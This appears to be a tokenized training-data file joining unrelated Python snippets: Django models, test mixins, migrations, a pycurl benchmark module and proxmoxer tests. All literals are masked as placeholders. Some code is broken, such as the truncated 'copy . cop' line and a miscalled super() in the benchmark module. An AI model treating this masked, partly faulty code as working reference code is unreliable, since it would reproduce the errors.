( ) <EOL> class roi_pair ( models . Model ) : <EOL> committee = models . ForeignKey ( '<STR_LIT>' ) <EOL> candidate = models . ForeignKey ( '<STR_LIT>' ) <EOL> support_oppose = models . CharField ( max_length = <NUM_LIT:1> , <EOL> choices = ( ( '<STR_LIT:S>' , '<STR_LIT>' ) , ( '<STR_LIT:O>' , '<STR_LIT>' ) ) <EOL> ) <EOL> total_ind_exp = models . DecimalField ( max_digits = <NUM_LIT> , decimal_places = <NUM_LIT:2> , null = True ) <EOL> def show_support_oppose ( self ) : <EOL> if self . support_oppose . upper ( ) == '<STR_LIT:S>' : <EOL> return '<STR_LIT>' <EOL> elif self . support_oppose . upper ( ) == '<STR_LIT:O>' : <EOL> return '<STR_LIT>' <EOL> else : <EOL> return '<STR_LIT>' <EOL> def verdict ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . candidate . cand_is_gen_winner == None : <EOL> return "<STR_LIT>" <EOL> if self . candidate . cand_is_gen_winner == True : <EOL> if self . support_oppose . upper ( ) == '<STR_LIT:S>' : <EOL> return '<STR_LIT>' <EOL> elif self . support_oppose . upper ( ) == '<STR_LIT:O>' : <EOL> return '<STR_LIT>' <EOL> else : <EOL> return "<STR_LIT>" <EOL> if self . candidate . cand_is_gen_winner == False : <EOL> if self . support_oppose . upper ( ) == '<STR_LIT:S>' : <EOL> return '<STR_LIT>' <EOL> elif self . support_oppose . upper ( ) == '<STR_LIT:O>' : <EOL> return '<STR_LIT>' <EOL> else : <EOL> return "<STR_LIT>" <EOL> return "<STR_LIT>" </s>
<s> from django . contrib import messages <EOL> from django . contrib . messages . storage . base import Message <EOL> from django . core import mail <EOL> from django . http import HttpResponseRedirect , HttpResponsePermanentRedirect <EOL> class StatusCodeAssertionsMixin ( object ) : <EOL> redirect_codes = [ <EOL> HttpResponseRedirect . status_code , <EOL> HttpResponsePermanentRedirect . status_code <EOL> ] <EOL> def assert_status_equal ( self , response , status_code_or_response ) : <EOL> status_code = self . _get_status_code ( status_code_or_response ) <EOL> self . assertEqual ( <EOL> response . status_code , <EOL> status_code , <EOL> '<STR_LIT>' . format ( <EOL> response . status_code , <EOL> status_code , <EOL> ) <EOL> ) <EOL> def assert_status_in ( self , response , status_codes_or_responses ) : <EOL> status_codes = list ( map ( self . _get_status_code , status_codes_or_responses ) ) <EOL> self . assertIn ( <EOL> response . status_code , <EOL> status_codes , <EOL> '<STR_LIT>' . format ( <EOL> response . status_code , <EOL> '<STR_LIT:U+002CU+0020>' . join ( str ( code ) for code in status_codes ) , <EOL> ) <EOL> ) <EOL> def _get_redirect_assertion_message ( self , response ) : <EOL> return '<STR_LIT>' . format ( <EOL> response . status_code <EOL> ) <EOL> def assert_redirect ( self , response , expected_url = None ) : <EOL> """<STR_LIT>""" <EOL> self . assertIn ( <EOL> response . status_code , <EOL> self . redirect_codes , <EOL> self . _get_redirect_assertion_message ( response ) , <EOL> ) <EOL> if expected_url : <EOL> location_header = response . _headers . get ( '<STR_LIT:location>' , None ) <EOL> self . assertEqual ( <EOL> location_header , <EOL> ( '<STR_LIT>' , str ( expected_url ) ) , <EOL> '<STR_LIT>' . format ( <EOL> expected_url , <EOL> location_header [ <NUM_LIT:1> ] , <EOL> ) <EOL> ) <EOL> def assert_not_redirect ( self , response ) : <EOL> self . assertNotIn ( <EOL> response . status_code , <EOL> self . redirect_codes , <EOL> self . _get_redirect_assertion_message ( response ) <EOL> ) <EOL> def _get_status_code ( self , status_code_or_response ) : <EOL> try : <EOL> return status_code_or_response . status_code <EOL> except AttributeError : <EOL> return status_code_or_response <EOL> class EmailAssertionsMixin ( object ) : <EOL> def assert_emails_in_mailbox ( self , count ) : <EOL> self . assertEqual ( <EOL> len ( mail . outbox ) , <EOL> count , <EOL> '<STR_LIT>' . format ( <EOL> len ( mail . outbox ) , <EOL> count , <EOL> ) <EOL> ) <EOL> def _is_email_matching_criteria ( self , email , ** kwargs ) : <EOL> for key , value in kwargs . items ( ) : <EOL> if getattr ( email , key ) != value : <EOL> return False <EOL> return True <EOL> def assert_email ( self , email , ** kwargs ) : <EOL> for key , value in kwargs . items ( ) : <EOL> self . assertEqual ( <EOL> getattr ( email , key ) , <EOL> value , <EOL> '<STR_LIT>' . format ( <EOL> key , <EOL> value , <EOL> getattr ( email , key ) , <EOL> ) <EOL> ) <EOL> def assert_email_exists ( self , ** kwargs ) : <EOL> for email in mail . outbox : <EOL> if self . _is_email_matching_criteria ( email , ** kwargs ) : <EOL> return <EOL> raise AssertionError ( '<STR_LIT>' ) <EOL> class MessagesAssertionsMixin ( object ) : <EOL> def assert_messages_sent ( self , request , count ) : <EOL> sent = len ( messages . get_messages ( request ) ) <EOL> self . assertEqual ( <EOL> sent , <EOL> count , <EOL> '<STR_LIT>' . format ( <EOL> sent , <EOL> count , <EOL> ) <EOL> ) <EOL> def assert_message_exists ( self , request , level , message ) : <EOL> self . assertIn ( <EOL> Message ( level = level , message = message ) , <EOL> messages . get_messages ( request ) , <EOL> '<STR_LIT>' <EOL> ) <EOL> class _InstanceContext ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , enter_assertion , exit_assertion , model_class , ** kwargs ) : <EOL> self . enter_assertion = enter_assertion <EOL> self . exit_assertion = exit_assertion <EOL> self . model_class = model_class <EOL> self . kwargs = kwargs <EOL> def __enter__ ( self ) : <EOL> self . enter_assertion ( self . model_class , ** self . kwargs ) <EOL> return self <EOL> def __exit__ ( self , exc_type , exc_value , traceback ) : <EOL> self . exit_assertion ( self . model_class , ** self . kwargs ) <EOL> return True <EOL> class InstanceAssertionsMixin ( object ) : <EOL> """<STR_LIT>""" <EOL> def assert_instance_exists ( self , model_class , ** kwargs ) : <EOL> try : <EOL> obj = model_class . _default_manager . get ( ** kwargs ) <EOL> self . assertIsNotNone ( obj ) <EOL> except model_class . DoesNotExist : <EOL> raise AssertionError ( '<STR_LIT>' . format ( <EOL> model_class . __name__ , <EOL> ) <EOL> ) <EOL> def assert_instance_does_not_exist ( self , model_class , ** kwargs ) : <EOL> try : <EOL> instance = model_class . _default_manager . get ( ** kwargs ) <EOL> raise AssertionError ( '<STR_LIT>' . format ( <EOL> model_class . __name__ , <EOL> instance , <EOL> ) ) <EOL> except model_class . DoesNotExist : <EOL> pass <EOL> def assert_instance_created ( self , model_class , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return _InstanceContext ( <EOL> self . assert_instance_does_not_exist , <EOL> self . assert_instance_exists , <EOL> model_class , <EOL> ** kwargs <EOL> ) <EOL> def assert_instance_deleted ( self , model_class , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return _InstanceContext ( <EOL> self . assert_instance_exists , <EOL> self . assert_instance_does_not_exist , <EOL> model_class , <EOL> ** kwargs <EOL> ) <EOL> class CompleteAssertionsMixin ( <EOL> StatusCodeAssertionsMixin , <EOL> EmailAssertionsMixin , <EOL> MessagesAssertionsMixin , <EOL> InstanceAssertionsMixin , <EOL> ) : <EOL> pass </s>
<s> from django . conf . urls import url , include <EOL> urlpatterns = ( <EOL> url ( r'<STR_LIT>' , include ( '<STR_LIT>' ) ) , <EOL> ) </s>
<s> import math <EOL> import json <EOL> import pycurl <EOL> import sys <EOL> from . import tests <EOL> from . tests import Test <EOL> from . import parsing <EOL> from . parsing import * <EOL> if sys . version_info [ <NUM_LIT:0> ] > <NUM_LIT:2> : <EOL> from past . builtins import basestring <EOL> from . import six <EOL> from . six import binary_type <EOL> from . six import text_type <EOL> """<STR_LIT>""" <EOL> METRICS = { <EOL> '<STR_LIT>' : pycurl . NAMELOOKUP_TIME , <EOL> '<STR_LIT>' : pycurl . CONNECT_TIME , <EOL> '<STR_LIT>' : pycurl . APPCONNECT_TIME , <EOL> '<STR_LIT>' : pycurl . PRETRANSFER_TIME , <EOL> '<STR_LIT>' : pycurl . STARTTRANSFER_TIME , <EOL> '<STR_LIT>' : pycurl . REDIRECT_TIME , <EOL> '<STR_LIT>' : pycurl . TOTAL_TIME , <EOL> '<STR_LIT>' : pycurl . SIZE_DOWNLOAD , <EOL> '<STR_LIT>' : pycurl . SIZE_UPLOAD , <EOL> '<STR_LIT>' : pycurl . REQUEST_SIZE , <EOL> '<STR_LIT>' : pycurl . SPEED_DOWNLOAD , <EOL> '<STR_LIT>' : pycurl . SPEED_UPLOAD , <EOL> '<STR_LIT>' : pycurl . REDIRECT_COUNT , <EOL> '<STR_LIT>' : pycurl . NUM_CONNECTS <EOL> } <EOL> AGGREGATES = { <EOL> '<STR_LIT>' : <EOL> lambda x : float ( sum ( x ) ) / float ( len ( x ) ) , <EOL> '<STR_LIT>' : <EOL> lambda x : float ( sum ( x ) ) / float ( len ( x ) ) , <EOL> '<STR_LIT>' : <EOL> lambda x : <NUM_LIT:1.0> / ( sum ( [ <NUM_LIT:1.0> / float ( y ) for y in x ] ) / float ( len ( x ) ) ) , <EOL> '<STR_LIT>' : lambda x : median ( x ) , <EOL> '<STR_LIT>' : lambda x : std_deviation ( x ) , <EOL> '<STR_LIT>' : lambda x : sum ( x ) , <EOL> '<STR_LIT>' : lambda x : sum ( x ) <EOL> } <EOL> OUTPUT_FORMATS = [ u'<STR_LIT>' , u'<STR_LIT>' ] <EOL> def median ( array ) : <EOL> """<STR_LIT>""" <EOL> mysorted = [ x for x in array ] <EOL> mysorted . sort ( ) <EOL> middle = int ( len ( mysorted ) / <NUM_LIT:2> ) <EOL> if len ( mysorted ) % <NUM_LIT:2> == <NUM_LIT:0> : <EOL> return float ( ( mysorted [ middle ] + mysorted [ middle - <NUM_LIT:1> ] ) ) / <NUM_LIT:2> <EOL> else : <EOL> return mysorted [ middle ] <EOL> def std_deviation ( array ) : <EOL> """<STR_LIT>""" <EOL> if not array or len ( array ) == <NUM_LIT:1> : <EOL> return <NUM_LIT:0> <EOL> average = AGGREGATES [ '<STR_LIT>' ] ( array ) <EOL> variance = map ( lambda x : ( x - average ) ** <NUM_LIT:2> , array ) <EOL> try : <EOL> len ( variance ) <EOL> except TypeError : <EOL> variance = list ( variance ) <EOL> stdev = AGGREGATES [ '<STR_LIT>' ] ( variance ) <EOL> return math . sqrt ( stdev ) <EOL> class Benchmark ( Test ) : <EOL> """<STR_LIT>""" <EOL> warmup_runs = <NUM_LIT:10> <EOL> benchmark_runs = <NUM_LIT:100> <EOL> output_format = u'<STR_LIT>' <EOL> output_file = None <EOL> metrics = set ( ) <EOL> raw_metrics = set ( ) <EOL> aggregated_metrics = dict ( ) <EOL> def ninja_copy ( self ) : <EOL> """<STR_LIT>""" <EOL> output = Benchmark ( ) <EOL> myvars = vars ( self ) <EOL> output . __dict__ = myvars . copy ( ) <EOL> return output <EOL> def add_metric ( self , metric_name , aggregate = None ) : <EOL> """<STR_LIT>""" <EOL> clean_metric = metric_name . lower ( ) . strip ( ) <EOL> if clean_metric . lower ( ) not in METRICS : <EOL> raise Exception ( "<STR_LIT>" + metric_name + <EOL> "<STR_LIT>" ) <EOL> self . metrics . add ( clean_metric ) <EOL> if not aggregate : <EOL> self . raw_metrics . add ( clean_metric ) <EOL> elif aggregate . lower ( ) . strip ( ) in AGGREGATES : <EOL> clean_aggregate = aggregate . lower ( ) . strip ( ) <EOL> current_aggregates = self . aggregated_metrics . get ( <EOL> clean_metric , list ( ) ) <EOL> current_aggregates . append ( clean_aggregate ) <EOL> self . aggregated_metrics [ clean_metric ] = current_aggregates <EOL> else : <EOL> raise Exception ( "<STR_LIT>" + aggregate + <EOL> "<STR_LIT>" ) <EOL> return self <EOL> def __init__ ( self ) : <EOL> self . metrics = set ( ) <EOL> self . raw_metrics = set ( ) <EOL> self . aggregated_metrics = dict ( ) <EOL> super ( Benchmark , self ) . __init__ ( ) <EOL> def __str__ ( self ) : <EOL> return json . dumps ( self , default = safe_to_json ) <EOL> def realize_partial ( self , context = None ) : <EOL> """<STR_LIT>""" <EOL> if not self . is_dynamic ( ) : <EOL> return self <EOL> if self . is_context_modifier ( ) : <EOL> return self <EOL> else : <EOL> copyout = copy . cop <EOL> pass <EOL> def configure_curl ( self , timeout = tests . DEFAULT_TIMEOUT , context = None , curl_handle = None ) : <EOL> curl = super ( ) . configure_curl ( self , timeout = timeout , <EOL> context = context , curl_handle = curl_handle ) <EOL> curl . setopt ( pycurl . FORBID_REUSE , <NUM_LIT:1> ) <EOL> return curl <EOL> def parse_benchmark ( base_url , node ) : <EOL> """<STR_LIT>""" <EOL> node = lowercase_keys ( flatten_dictionaries ( node ) ) <EOL> benchmark = Benchmark ( ) <EOL> benchmark = Test . parse_test ( base_url , node , benchmark ) <EOL> for key , value in node . items ( ) : <EOL> if key == u'<STR_LIT>' : <EOL> benchmark . warmup_runs = int ( value ) <EOL> elif key == u'<STR_LIT>' : <EOL> benchmark . benchmark_runs = int ( value ) <EOL> elif key == u'<STR_LIT>' : <EOL> format = value . lower ( ) <EOL> if format in OUTPUT_FORMATS : <EOL> benchmark . output_format = format <EOL> else : <EOL> raise ValueError ( '<STR_LIT>' + format ) <EOL> elif key == u'<STR_LIT>' : <EOL> if not isinstance ( value , basestring ) : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> benchmark . output_file = value <EOL> elif key == u'<STR_LIT>' : <EOL> if isinstance ( value , basestring ) : <EOL> benchmark . add_metric ( tests . coerce_to_string ( value ) ) <EOL> elif isinstance ( value , list ) or isinstance ( value , set ) : <EOL> for metric in value : <EOL> if isinstance ( metric , dict ) : <EOL> for metricname , aggregate in metric . items ( ) : <EOL> if not isinstance ( metricname , basestring ) : <EOL> raise TypeError ( <EOL> "<STR_LIT>" ) <EOL> if not isinstance ( aggregate , basestring ) : <EOL> raise TypeError ( <EOL> "<STR_LIT>" ) <EOL> benchmark . add_metric ( tests . coerce_to_string ( metricname ) , <EOL> tests . coerce_to_string ( aggregate ) ) <EOL> elif isinstance ( metric , basestring ) : <EOL> benchmark . add_metric ( tests . coerce_to_string ( metric ) ) <EOL> elif isinstance ( value , dict ) : <EOL> for metricname , aggregate in value . items ( ) : <EOL> if not isinstance ( metricname , basestring ) : <EOL> raise TypeError ( <EOL> "<STR_LIT>" ) <EOL> if not isinstance ( aggregate , basestring ) : <EOL> raise TypeError ( <EOL> "<STR_LIT>" ) <EOL> benchmark . add_metric ( tests . coerce_to_string ( metricname ) , <EOL> tests . coerce_to_string ( aggregate ) ) <EOL> else : <EOL> raise TypeError ( <EOL> "<STR_LIT>" + str ( value ) ) <EOL> return benchmark </s>
<s> </s>
<s> from setuptools import setup , find_packages <EOL> version = '<STR_LIT>' <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = version , <EOL> description = '<STR_LIT>' , <EOL> keywords = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> install_requires = [ '<STR_LIT>' , ] , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> package_dir = { '<STR_LIT>' : '<STR_LIT:src>' } , <EOL> packages = [ '<STR_LIT>' ] , <EOL> include_package_data = True , <EOL> ) </s>
<s> def get_or_create ( model , ** kwargs ) : <EOL> from sqlalchemy . orm . exc import NoResultFound <EOL> try : <EOL> return model . query . filter_by ( ** kwargs ) . one ( ) <EOL> except NoResultFound : <EOL> return model ( ** kwargs ) <EOL> def make_list ( str_or_list ) : <EOL> '''<STR_LIT>''' <EOL> if isinstance ( str_or_list , basestring ) : <EOL> return [ str_or_list , ] <EOL> return str_or_list </s>
<s> import requests <EOL> from templates . text import TextTemplate <EOL> def process ( input , entities = None ) : <EOL> output = { } <EOL> try : <EOL> r = requests . get ( '<STR_LIT>' ) <EOL> data = r . json ( ) <EOL> output [ '<STR_LIT:input>' ] = input <EOL> output [ '<STR_LIT>' ] = TextTemplate ( data [ '<STR_LIT>' ] + '<STR_LIT>' + data [ '<STR_LIT>' ] ) . get_message ( ) <EOL> output [ '<STR_LIT:success>' ] = True <EOL> except : <EOL> output [ '<STR_LIT:success>' ] = False <EOL> return output </s>
<s> __author__ = '<STR_LIT>' <EOL> __copyright__ = '<STR_LIT>' <EOL> __licence__ = '<STR_LIT>' <EOL> from mock import patch , MagicMock <EOL> from nose . tools import eq_ , ok_ <EOL> from proxmoxer import ProxmoxAPI <EOL> @ patch ( '<STR_LIT>' ) <EOL> def test_https_connection ( req_session ) : <EOL> response = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> req_session . request . return_value = response <EOL> ProxmoxAPI ( '<STR_LIT>' , user = '<STR_LIT>' , password = '<STR_LIT>' , port = <NUM_LIT> , verify_ssl = False ) <EOL> call = req_session . return_value . request . call_args [ <NUM_LIT:1> ] <EOL> eq_ ( call [ '<STR_LIT:url>' ] , '<STR_LIT>' ) <EOL> eq_ ( call [ '<STR_LIT:data>' ] , { '<STR_LIT:username>' : '<STR_LIT>' , '<STR_LIT:password>' : '<STR_LIT>' } ) <EOL> eq_ ( call [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> eq_ ( call [ '<STR_LIT>' ] , False ) <EOL> class TestSuite ( ) : <EOL> proxmox = None <EOL> serializer = None <EOL> session = None <EOL> @ patch ( '<STR_LIT>' ) <EOL> def setUp ( self , session ) : <EOL> response = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } <EOL> session . request . return_value = response <EOL> self . proxmox = ProxmoxAPI ( '<STR_LIT>' , user = '<STR_LIT>' , password = '<STR_LIT>' , port = <NUM_LIT> , verify_ssl = False ) <EOL> self . serializer = MagicMock ( ) <EOL> self . session = MagicMock ( ) <EOL> self . session . request . return_value . status_code = <NUM_LIT:200> <EOL> self . proxmox . _store [ '<STR_LIT>' ] = self . session <EOL> self . proxmox . _store [ '<STR_LIT>' ] = self . serializer <EOL> def test_get ( self ) : <EOL> self . proxmox . nodes ( '<STR_LIT>' ) . storage ( '<STR_LIT>' ) . get ( ) <EOL> eq_ ( self . session . request . call_args [ <NUM_LIT:0> ] , ( '<STR_LIT:GET>' , '<STR_LIT>' ) ) <EOL> def test_delete ( self ) : <EOL> self . proxmox . nodes ( '<STR_LIT>' ) . openvz ( <NUM_LIT:100> ) . delete ( ) <EOL> eq_ ( self . session . request . call_args [ <NUM_LIT:0> ] , ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> self . proxmox . nodes ( '<STR_LIT>' ) . openvz ( '<STR_LIT>' ) . delete ( ) <EOL> eq_ ( self . session . request . call_args [ <NUM_LIT:0> ] , ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> def test_post ( self ) : <EOL> node = self . proxmox . nodes ( '<STR_LIT>' ) <EOL> node . openvz . create ( vmid = <NUM_LIT> , <EOL> ostemplate = '<STR_LIT>' , <EOL> hostname = '<STR_LIT:test>' , <EOL> storage = '<STR_LIT>' , <EOL> memory = <NUM_LIT> , <EOL> swap = <NUM_LIT> , <EOL> cpus = <NUM_LIT:1> , <EOL> disk = <NUM_LIT:4> , <EOL> password = '<STR_LIT>' , <EOL> ip_address = '<STR_LIT>' ) <EOL> eq_ ( self . session . request . call_args [ <NUM_LIT:0> ] , ( '<STR_LIT:POST>' , '<STR_LIT>' ) ) <EOL> ok_ ( '<STR_LIT:data>' in self . session . request . call_args [ <NUM_LIT:1> ] ) <EOL> data = self . session . request . call_args [ <NUM_LIT:1> ] [ '<STR_LIT:data>' ] <EOL> eq_ ( data [ '<STR_LIT>' ] , <NUM_LIT:1> ) <EOL> eq_ ( data [ '<STR_LIT>' ] , <NUM_LIT:4> ) <EOL> eq_ ( data [ '<STR_LIT>' ] , '<STR_LIT:test>' ) <EOL> eq_ ( data [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> eq_ ( data [ '<STR_LIT>' ] , <NUM_LIT> ) <EOL> eq_ ( data [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> eq_ ( data [ '<STR_LIT:password>' ] , '<STR_LIT>' ) <EOL> eq_ ( data [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> eq_ ( data [ '<STR_LIT>' ] , <NUM_LIT> ) <EOL> eq_ ( data [ '<STR_LIT>' ] , <NUM_LIT> ) <EOL> node = self . proxmox . nodes ( '<STR_LIT>' ) <EOL> node . openvz . post ( vmid = <NUM_LIT> , <EOL> ostemplate = '<STR_LIT>' , <EOL> hostname = '<STR_LIT>' , <EOL> storage = '<STR_LIT>' , <EOL> memory = <NUM_LIT> , <EOL> swap = <NUM_LIT> , <EOL> cpus = <NUM_LIT:2> , <EOL> disk = <NUM_LIT:8> , <EOL> password = '<STR_LIT>' , <EOL> ip_address = '<STR_LIT>' ) <EOL> eq_ ( self . session . request . call_args [ <NUM_LIT:0> ] , ( '<STR_LIT:POST>' , '<STR_LIT>' ) ) <EOL> ok_ ( '<STR_LIT:data>' in self . session . request . call_args [ <NUM_LIT:1> ] ) <EOL> data = self . session . request . call_args [ <NUM_LIT:1> ] [ '<STR_LIT:data>' ] <EOL> eq_ ( data [ '<STR_LIT>' ] , <NUM_LIT:2> ) <EOL> eq_ ( data [ '<STR_LIT>' ] , <NUM_LIT:8> ) <EOL> eq_ ( data [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> eq_ ( data [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> eq_ ( data [ '<STR_LIT>' ] , <NUM_LIT> ) <EOL> eq_ ( data [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> eq_ ( data [ '<STR_LIT:password>' ] , '<STR_LIT>' ) <EOL> eq_ ( data [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> eq_ ( data [ '<STR_LIT>' ] , <NUM_LIT> ) <EOL> eq_ ( data [ '<STR_LIT>' ] , <NUM_LIT> ) <EOL> def test_put ( self ) : <EOL> node = self . proxmox . nodes ( '<STR_LIT>' ) <EOL> node . openvz ( <NUM_LIT> ) . config . set ( cpus = <NUM_LIT:4> , memory = <NUM_LIT> , ip_address = '<STR_LIT>' , onboot = True ) <EOL> eq_ ( self . session . request . call_args [ <NUM_LIT:0> ] , ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> data = self . session . request . call_args [ <NUM_LIT:1> ] [ '<STR_LIT:data>' ] <EOL> eq_ ( data [ '<STR_LIT>' ] , <NUM_LIT:4> ) <EOL> eq_ ( data [ '<STR_LIT>' ] , <NUM_LIT> ) <EOL> eq_ ( data [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> eq_ ( data [ '<STR_LIT>' ] , True ) <EOL> node = self . proxmox . nodes ( '<STR_LIT>' ) <EOL> node . openvz ( <NUM_LIT> ) . config . put ( cpus = <NUM_LIT:2> , memory = <NUM_LIT> , ip_address = '<STR_LIT>' , onboot = False ) <EOL> eq_ ( self . session . request . call_args [ <NUM_LIT:0> ] , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> data = self . session . request . call_args [ <NUM_LIT:1> ] [ '<STR_LIT:data>' ] <EOL> eq_ ( data [ '<STR_LIT>' ] , <NUM_LIT:2> ) <EOL> eq_ ( data [ '<STR_LIT>' ] , <NUM_LIT> ) <EOL> eq_ ( data [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> eq_ ( data [ '<STR_LIT>' ] , False ) </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . AlterField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . TextField ( blank = True , default = '<STR_LIT>' ) , <EOL> preserve_default = True , <EOL> ) , <EOL> ] </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> ] </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> def migrate_invoiced ( apps , schema_editor ) : <EOL> """<STR_LIT>""" <EOL> Event = apps . get_model ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> Event . objects . filter ( invoiced__isnull = True ) . update ( invoice_status = '<STR_LIT>' ) <EOL> Event . objects . filter ( invoiced = True ) . update ( invoice_status = '<STR_LIT>' ) <EOL> Event . objects . filter ( invoiced = False ) . update ( invoice_status = '<STR_LIT>' ) <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . AddField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . CharField ( verbose_name = '<STR_LIT>' , max_length = <NUM_LIT> , default = '<STR_LIT>' , blank = True , choices = [ ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) ] ) , <EOL> ) , <EOL> migrations . RunPython ( migrate_invoiced ) , <EOL> migrations . RemoveField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> ) , <EOL> ] </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> ] </s>
<s> from django import template <EOL> from django . utils . safestring import mark_safe <EOL> register = template . Library ( ) <EOL> @ register . simple_tag <EOL> def assign ( variable ) : <EOL> """<STR_LIT>""" <EOL> return mark_safe ( variable ) </s>
<s> import math <EOL> import os <EOL> import resource <EOL> import socket <EOL> def add_dicts ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> result = { } <EOL> for d in args : <EOL> result . update ( d ) <EOL> result . update ( kwargs ) <EOL> return result <EOL> def raise_file_descriptor_limit ( ) : <EOL> _ , hard_nofile = resource . getrlimit ( resource . RLIMIT_NOFILE ) <EOL> nofile_target = hard_nofile <EOL> if os . geteuid ( ) == <NUM_LIT:0> : <EOL> nofile_target = <NUM_LIT> * <NUM_LIT:64> <EOL> while True : <EOL> try : <EOL> hard_nofile = nofile_target <EOL> resource . setrlimit ( resource . RLIMIT_NOFILE , <EOL> ( nofile_target , hard_nofile ) ) <EOL> except ValueError : <EOL> nofile_target /= <NUM_LIT> <EOL> break <EOL> def is_ipv6 ( addr ) : <EOL> """<STR_LIT>""" <EOL> sockaddrs = socket . getaddrinfo ( addr , None ) <EOL> if any ( [ addr_tuple [ <NUM_LIT:0> ] == socket . AF_INET for addr_tuple in sockaddrs ] ) : <EOL> return False <EOL> return True <EOL> def mean ( iterable ) : <EOL> if not iterable : <EOL> return None <EOL> return sum ( iterable ) / len ( iterable ) <EOL> def uncorrected_stdev ( iterable ) : <EOL> """<STR_LIT>""" <EOL> if not iterable : <EOL> return None <EOL> if len ( iterable ) == <NUM_LIT:1> : <EOL> return <NUM_LIT:0> <EOL> iter_mean = mean ( iterable ) <EOL> deltas = [ ( x - iter_mean ) ** <NUM_LIT:2> for x in iterable ] <EOL> variance = float ( sum ( deltas ) ) / len ( iterable ) <EOL> return math . sqrt ( variance ) <EOL> def median ( iterable ) : <EOL> if not iterable : <EOL> return None <EOL> sorted_list = sorted ( iterable ) <EOL> if len ( sorted_list ) % <NUM_LIT:2> == <NUM_LIT:1> : <EOL> return sorted_list [ len ( sorted_list ) / <NUM_LIT:2> ] <EOL> else : <EOL> right_median = sorted_list [ len ( sorted_list ) / <NUM_LIT:2> ] <EOL> left_median = sorted_list [ len ( sorted_list ) / <NUM_LIT:2> - <NUM_LIT:1> ] <EOL> return ( right_median + left_median ) / <NUM_LIT> </s>
<s> from setuptools import setup , find_packages <EOL> import sys , os <EOL> version = '<STR_LIT>' <EOL> try : <EOL> from mercurial import ui , hg , error <EOL> repo = hg . repository ( ui . ui ( ) , "<STR_LIT:.>" ) <EOL> ver = repo [ version ] <EOL> except ImportError : <EOL> pass <EOL> except error . RepoLookupError : <EOL> tip = repo [ "<STR_LIT>" ] <EOL> version = version + "<STR_LIT>" % ( tip . rev ( ) , tip . hex ( ) [ : <NUM_LIT:12> ] ) <EOL> except error . RepoError : <EOL> pass <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = version , <EOL> description = "<STR_LIT>" , <EOL> long_description = """<STR_LIT>""" , <EOL> classifiers = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] , <EOL> keywords = "<STR_LIT>" , <EOL> author = "<STR_LIT>" , <EOL> author_email = '<STR_LIT>' , <EOL> url = "<STR_LIT>" , <EOL> license = '<STR_LIT>' , <EOL> packages = find_packages ( exclude = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> include_package_data = True , <EOL> zip_safe = False , <EOL> install_requires = [ <EOL> "<STR_LIT>" , <EOL> 